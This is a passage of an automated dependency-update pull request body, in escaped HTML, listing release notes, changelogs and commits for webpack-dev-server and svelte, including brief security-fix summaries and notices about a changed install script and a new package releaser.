href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.20 to 5.55.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(print): handle \u003ccode\u003esvelte:body\u003c/code\u003e and fix keyframe percentage double-printing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18234\"\u003e#18234\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.8\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0bb715d3cfe51134756e79b6193dacccfa77361f\"\u003e\u003ccode\u003e0bb715d\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18255\"\u003e#18255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/49538608356eabc74fc182b03449112a4fa1f12d\"\u003e\u003ccode\u003e4953860\u003c/code\u003e\u003c/a\u003e chore: remove unused class property (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18307\"\u003e#18307\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/638ab370a561f97552229589f2f334655426fe5c\"\u003e\u003ccode\u003e638ab37\u003c/code\u003e\u003c/a\u003e fix: prevent batch unlinking twice (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18303\"\u003e#18303\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0da9f9e2ab515da16d624c5bc48b554beb179f92\"\u003e\u003ccode\u003e0da9f9e\u003c/code\u003e\u003c/a\u003e fix: disallow effect creation after \u003ccode\u003eawait\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18299\"\u003e#18299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d4be4e297365030b5cbcb676bda133f2840816b2\"\u003e\u003ccode\u003ed4be4e2\u003c/code\u003e\u003c/a\u003e chore: ensure treeshaking test runs during CI (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18302\"\u003e#18302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e705369dee060e74ad9456e45824f36b1ee3c6cf\"\u003e\u003ccode\u003ee705369\u003c/code\u003e\u003c/a\u003e fix: propagate async \u003ca href=\"https://github.com/const\"\u003e\u003ccode\u003e@​const\u003c/code\u003e\u003c/a\u003e blockers through closure references (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18309\"\u003e#18309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ec08dbc7ee156d34816586feb49bb8650579e41f\"\u003e\u003ccode\u003eec08dbc\u003c/code\u003e\u003c/a\u003e fix: only unlink batch if we're done with it (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18298\"\u003e#18298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/b40c359d44196b7b87745259243333763ed61ec5\"\u003e\u003ccode\u003eb40c359\u003c/code\u003e\u003c/a\u003e fix: don't assume boundary exists during increment/decrement (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18289\"\u003e#18289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/c01e598fff2a851323fb61c6325ef51b87f019fd\"\u003e\u003ccode\u003ec01e598\u003c/code\u003e\u003c/a\u003e fix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18297\"\u003e#18297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/070a0c4f7708ae0caa209ff762d98c0f117e6adb\"\u003e\u003ccode\u003e070a0c4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;perf: use Set instead of Array for constant lookups in utils.js\u0026quot; (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18\"\u003e#18\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.55.10/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the 